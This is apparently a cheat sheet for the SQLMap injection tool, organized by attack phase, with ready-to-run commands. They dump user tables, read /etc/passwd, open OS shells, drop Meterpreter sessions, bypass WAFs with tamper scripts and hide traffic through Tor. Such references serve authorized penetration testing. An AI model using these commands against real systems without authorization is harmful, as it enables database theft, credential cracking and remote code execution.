A flag-organized reference. Each table is one logical phase; each row is one flag with its purpose. When in doubt about a flag, check this page first; see the topic pages (linked at the top of each section) for context.
```bash
# A complete operator workflow in shorthand
sqlmap -r req.txt --batch                                                      # spec the target
sqlmap -r req.txt --batch --level=5 --risk=3 --tamper=between,space2comment    # detect with bypass
sqlmap -r req.txt --batch --dbs                                                # enumerate
sqlmap -r req.txt --batch -D prod -T users --dump                              # exfiltrate
sqlmap -r req.txt --batch --is-dba --file-read=/etc/passwd                     # post-exploit
sqlmap -r req.txt --batch --os-shell --technique=E                             # RCE
```
Success indicator: a working session that progresses cleanly through these phases without you opening the SQLMap help twice.
See Request Setup.

| Flag | Purpose |
|---|---|
| `-u URL` | Target URL (with GET params inline) |
| `--url URL` | Same as `-u` |
| `-r FILE` | Use Burp-captured HTTP request file |
| `--data STRING` | POST body (form-data, JSON, XML, whatever) |
| `--method M` | Override HTTP method (PUT, DELETE, PATCH, etc.) |
| `-p PARAM` | Restrict testing to a specific parameter |
| `--skip PARAM` | Skip testing this parameter |
| `*` (in URL/data) | Injection marker - restrict testing to this exact spot |
| `--param-del CHAR` | Parameter delimiter (default `&`, sometimes `;`) |
| `--param-exclude REGEX` | Skip parameters matching this regex |
| `--randomize PARAM` | Randomize this parameter’s value on every request |
| `--eval CODE` | Python code to compute parameter values pre-request |
| `--batch` | Auto-accept all interactive prompts with defaults |
| `--crawl=N` | Crawl the site to depth N, test forms found |
| `--forms` | Parse and test forms on the target URL |
| `-g GOOGLE_DORK` | Test all URLs from Google search results |
| `-m FILE` | Test multiple targets from a list file |

| Flag | Purpose |
|---|---|
| `-H 'Name: value'` | Add a custom header (repeatable) |
| `--headers="H1\nH2"` | Multiple headers in one flag |
| `--cookie="k=v; k2=v2"` | Cookie header |
| `--cookie-del CHAR` | Cookie value separator (default `;`) |
| `--load-cookies FILE` | Load Netscape/Mozilla-format cookies file |
| `--drop-set-cookie` | Ignore Set-Cookie in responses |
| `-A USER_AGENT` | Set User-Agent |
| `--user-agent UA` | Same as `-A` |
| `--random-agent` | Random UA per scan (from built-in pool) |
| `--mobile` | Use a mobile-browser UA |
| `--host HOST` | Set Host header |
| `--referer URL` | Set Referer header |
| `--auth-type TYPE` | HTTP auth type (Basic, Digest, NTLM, PKI) |
| `--auth-cred user:pass` | HTTP auth credentials |
| `--auth-file FILE` | PEM cert for client-cert auth |

| Flag | Purpose |
|---|---|
| `--proxy=URL` | Route through proxy (Burp = `http://127.0.0.1:8080`) |
| `--proxy-cred=user:pass` | Proxy credentials |
| `--proxy-file=FILE` | List of proxies, rotate through them |
| `--tor` | Use local Tor SOCKS proxy |
| `--tor-port=N` | Tor port if non-default |
| `--tor-type=SOCKS5` | Tor proxy type (default SOCKS5) |
| `--check-tor` | Verify Tor actually anonymizes |
| `--force-ssl` | Force HTTPS to target |
| `--ignore-proxy` | Ignore `$HTTP_PROXY` env var |
| `--ignore-redirects` | Don’t follow redirects |
| `--ignore-timeouts` | Treat timeouts as non-errors |
| `--delay=N` | Seconds between requests |
| `--timeout=N` | Per-request timeout |
| `--retries=N` | Retries per failing request (default 3) |
| `--keep-alive` | HTTP keep-alive |
| `--null-connection` | Use HEAD requests where possible for speed |
| `--threads=N` | Parallel requests (max 10) |

See Detection & Tuning.

| Flag | Purpose |
|---|---|
| `--level=1..5` | Test depth (default 1; 5 = all 7,800 payloads) |
| `--risk=1..3` | Risk tolerance (default 1; 3 = includes OR-based that may modify data) |
| `--prefix=STR` | Prepend STR to every payload |
| `--suffix=STR` | Append STR to every payload |
| `--dbms=NAME` | Skip DBMS fingerprint, force this DBMS |
| `--dbms-cred=user:pass` | DBMS credentials (for `--passwords` against specific user) |
| `--os=NAME` | Force OS (Linux, Windows) |
| `--invalid-bignum` | Use big numbers to invalidate (instead of negation) |
| `--invalid-logical` | Use logical ops to invalidate |
| `--invalid-string` | Use random strings to invalidate |
| `--no-cast` | Skip `CAST()` wrapper on extraction |
| `--no-escape` | Skip string escape in payloads |
| `--skip-static` | Test even parameters classified as static |
| `--skip-heuristics` | Skip heuristic detection |
| `--skip-urlencode` | Don’t URL-encode payloads |
| `--skip-waf` | Skip WAF/IPS detection heuristic |
| `--time-sec=N` | SLEEP seconds for time-based blind (default 5) |
| `--union-cols=N` | Force UNION column count |
| `--union-char=CHAR` | UNION fill character (default NULL + random ints) |
| `--union-from=TABLE` | Append FROM TABLE to UNION (Oracle, etc.) |
| `--second-url=URL` | Second-order URL to fetch after each payload |
| `--second-req=FILE` | Second-order request file |

| Flag | Purpose |
|---|---|
| `--string=TEXT` | TRUE responses contain TEXT |
| `--not-string=TEXT` | FALSE responses contain TEXT |
| `--regexp=PATTERN` | TRUE responses match regex |
| `--code=N` | TRUE responses return HTTP code N |
| `--titles` | Compare `<title>` rather than full body |
| `--text-only` | Strip HTML before comparison |
| `--parse-errors` | Print parsed DBMS errors |
| `--repair` | Re-run failed extractions on detection |

See the BEUSTQ technique matrix in SQLMap overview.

| Flag | Effect |
|---|---|
| `--technique=B` | Only boolean-based blind |
| `--technique=E` | Only error-based |
| `--technique=U` | Only UNION-based |
| `--technique=S` | Only stacked queries |
| `--technique=T` | Only time-based blind |
| `--technique=Q` | Only inline queries |
| `--technique=BEU` | Any subset (combine letters; default is BEUSTQ) |
| `--dns-domain=DOMAIN` | Enable out-of-band DNS exfil (you control DOMAIN’s DNS) |

See Enumeration.

| Flag | What it returns |
|---|---|
| `--banner` | DBMS version banner |
| `--current-user` | DB connection user |
| `--current-db` | Current database name |
| `--hostname` | DB server hostname |
| `--is-dba` | Whether current user has DBA rights |
| `--users` | List all DB users |
| `--passwords` | DB user password hashes (DBA usually required) |
| `--privileges` | Per-user privileges |
| `--roles` | Per-user roles (Oracle/MSSQL) |
| `--statements` | List currently-executing SQL (live) |

| Flag | What it returns |
|---|---|
| `--dbs` | All databases (schemas) |
| `--tables` | Tables in current DB (or in DB specified with `-D`) |
| `--columns` | Columns in current table (or `-T`) |
| `--schema` | Full schema overview (all DBs, tables, columns) |
| `--count` | Row counts per table |
| `--comments` | Include SQL comments in output |
| `--search` | Search across schema by keyword |
| `-D DB` | Restrict to database DB |
| `-T TABLE` | Restrict to table TABLE |
| `-C COL,COL2` | Restrict to columns |
| `--exclude-sysdbs` | Skip system DBs (mysql, sys, information_schema, etc.) |

| Flag | What it does |
|---|---|
| `--dump` | Dump entries from selected table/columns |
| `--dump-all` | Dump every accessible table from every accessible DB |
| `--where="COND"` | WHERE clause filter for `--dump` |
| `--start=N` | First row to extract |
| `--stop=N` | Last row to extract |
| `--first=N` | First character of value to extract (blind) |
| `--last=N` | Last character of value to extract (blind) |
| `--dump-format=FMT` | Output format: CSV (default), HTML, SQLITE |
| `--sql-query=Q` | Run a literal SQL query |
| `--sql-shell` | Interactive SQL prompt |
| `--sql-file=F` | Run SQL from file |

| Flag | What it does |
|---|---|
| (Interactive prompt when hashes are detected) | Offer to crack in-process |
| (Built-in wordlist) | `/usr/share/sqlmap/data/txt/wordlist.tx_` (~1.4M entries) |

The cracking happens inline during `--dump` or `--passwords` when SQLMap recognizes a hash format. To opt out non-interactively: `--batch` accepts all prompts including “do you want to crack” → yes.

See OS Exploitation.

| Flag | Purpose |
|---|---|
| `--file-read=PATH` | Read file from DB host |
| `--file-write=LOCAL` | Local file to write to DB host |
| `--file-dest=REMOTE_PATH` | Where to write on DB host |

| Flag | Purpose |
|---|---|
| `--os-shell` | Interactive OS shell on DB host |
| `--os-cmd=CMD` | One-shot OS command |
| `--os-pwn` | Drop a Meterpreter session via msfvenom |
| `--os-smbrelay` | SMB relay attack (MSSQL with xp_dirtree + Responder) |
| `--os-bof` | Buffer overflow exploit for MSSQL sp_replwritetovarbin |
| `--reg-read` | Read Windows registry key (MSSQL) |
| `--reg-add` | Write Windows registry key |
| `--reg-del` | Delete Windows registry key |
| `--reg-key=PATH` | Registry key path |
| `--reg-value=NAME` | Registry value name |
| `--reg-data=DATA` | Registry value data |
| `--reg-type=TYPE` | Registry value type (REG_SZ, REG_DWORD, etc.) |

| Flag | Purpose |
|---|---|
| `--msf-path=PATH` | Path to Metasploit framework |
| `--tmp-path=PATH` | Remote tempdir for staging |

See WAF Bypass.

| Flag | Purpose |
|---|---|
| `--random-agent` | Random real-browser UA |
| `--mobile` | Mobile UA |
| `--tamper=SCRIPT[,SCRIPT2,...]` | Apply tamper scripts to payloads (see list below) |
| `--list-tampers` | Print all available tamper scripts |
| `--chunked` | Send POST body as HTTP chunked transfer |
| `--hpp` | HTTP Parameter Pollution mode |
| `--csrf-token=NAME` | Auto-refresh CSRF token param |
| `--csrf-url=URL` | Fetch CSRF token from this URL |
| `--csrf-method=METHOD` | Method for CSRF token URL |
| `--csrf-data=DATA` | Data for CSRF token URL (if POST) |
| `--csrf-retries=N` | CSRF retries |
| `--safe-url=URL` | "Safe" URL to keep session alive |
| `--safe-post=DATA` | POST body for safe URL |
| `--safe-req=FILE` | Request file for safe URL |
| `--safe-freq=N` | Hit safe URL every N requests |
| `--randomize=PARAM` | Randomize parameter value per request |
| `--eval=CODE` | Python pre-request code |

| Tamper | Effect |
|---|---|
| `between` | `>` → `NOT BETWEEN 0 AND #`; `=` → `BETWEEN # AND #` |
| `space2comment` | space → `/**/` |
| `space2dash` | space → `--` `\n` + random string |
| `space2hash` | space → `#\n` + random string (MySQL) |
| `space2plus` | space → `+` |
| `space2randomblank` | space → random whitespace char |
| `randomcase` | random-case keywords (`SELECT` → `SeLeCt`) |
| `equaltolike` | `=` → `LIKE` |
| `0eunion` | `UNION` → `e0UNION` |
| `base64encode` | base64 the whole payload |
| `charencode` | URL-encode every char |
| `charunicodeencode` | Unicode-encode every char |
| `commalesslimit` | `LIMIT M,N` → `LIMIT N OFFSET M` (MySQL) |
| `apostrophenullencode` | `'` → `%00%27` |
| `apostrophemask` | `'` → unicode look-alike |
| `appendnullbyte` | append `%00` |
| `halfversionedmorekeywords` | versioned-comment prefix on keywords (MySQL) |
| `modsecurityversioned` | wrap query in MySQL versioned comment |
| `modsecurityzeroversioned` | wrap in zero-versioned comment |
| `percentage` | `%` before each char (ASP) |
| `plus2concat` | `+` → `CONCAT()` (MSSQL) |
| `plus2fnconcat` | `+` → `{fn CONCAT()}` (MSSQL ODBC) |
| `symboliclogical` | `AND`/`OR` → `&&`/`\|\|` |
| `versionedkeywords` | wrap non-function keywords in MySQL versioned comment |
| `versionedmorekeywords` | wrap every keyword in MySQL versioned comment |

Chaining respects predefined priority. Common combinations:

| Stack | Use case |
|---|---|
| `between` | First try when `=`/`>` blocked |
| `space2comment` | First try when spaces blocked |
| `between,space2comment` | Generic baseline bypass |
| `between,randomcase,space2comment` | Slightly stronger |
| `modsecurityversioned` | Specifically targets ModSecurity rules |
| `apostrophenullencode,space2comment` | Bypasses quote + space filters |
| `charunicodeencode` | Catches naive char-class filters |

| Flag | Purpose |
|---|---|
| `-v 0..6` | Verbosity (3 = payloads; 6 = full trace) |
| `--output-dir=PATH` | Custom location for session files |
| `--flush-session` | Discard cached state for this target |
| `--purge` | Delete entire SQLMap output directory |
| `--fresh-queries` | Don’t reuse cached query results |
| `-t FILE` | Log all HTTP traffic to FILE |
| `--har=FILE` | Save HTTP traffic as HAR (browser dev-tools format) |
| `--save=FILE` | Save options to a config file |
| `-c FILE` | Load options from config file |
| `--results-file=FILE` | Write `-m` summary to FILE |
| `--update` | Update SQLMap itself |
| `--version` | Print version |
| `-h` | Short help |
| `-hh` | Full help |
| `--api` | Run SQLMap REST API server |
| `--api-server` | Same |
| `--api-client` | API client mode |

| Flag | What it gives |
|---|---|
| `--dump-format=HTML` | Browseable HTML output of dumped tables |
| `--dump-format=SQLITE` | SQLite DB of dumped tables (queryable later) |
| `--har=FILE` | Full traffic in HAR format (open in browser dev tools) |
| Session files at `~/.sqlmap/output/<host>/` | Persistent - include in deliverables |

| Flag | Effect |
|---|---|
| `--threads=N` | Parallel requests (max 10) |
| `--predict-output` | Use prior values to skip already-known characters |
| `--keep-alive` | HTTP keep-alive |
| `--null-connection` | HEAD requests where possible (faster boolean blind) |
| `--no-cast` | Skip `CAST()` wrapper (faster, but breaks some extractions) |
| `--fresh-queries` | Don’t reuse cached query results |
| `--time-sec=N` | SLEEP delay for time-based (lower = faster but more false positives) |

```bash
sqlmap -u 'http://target/vuln.php?id=1' --batch

sqlmap -r req.txt --batch

sqlmap -u 'http://target/api/items' \
  -H 'Content-Type: application/json' \
  --data '{"id":1*}' --batch

sqlmap -r req.txt --batch --level=5 --risk=3 \
  --tamper=between,space2comment --random-agent --dbms=MySQL

sqlmap -r req.txt --batch -D prod -T users --dump

sqlmap -r req.txt --batch --is-dba                    # confirm DBA first
sqlmap -r req.txt --batch --os-shell --technique=E    # then interactive

sqlmap -r req.txt --batch --file-read=/etc/passwd

sqlmap -r req.txt --batch --tor --tor-type=SOCKS5 --check-tor

sqlmap -r req.txt --batch --proxy=http://127.0.0.1:8080 --ignore-certs

sqlmap -r req.txt --flush-session
```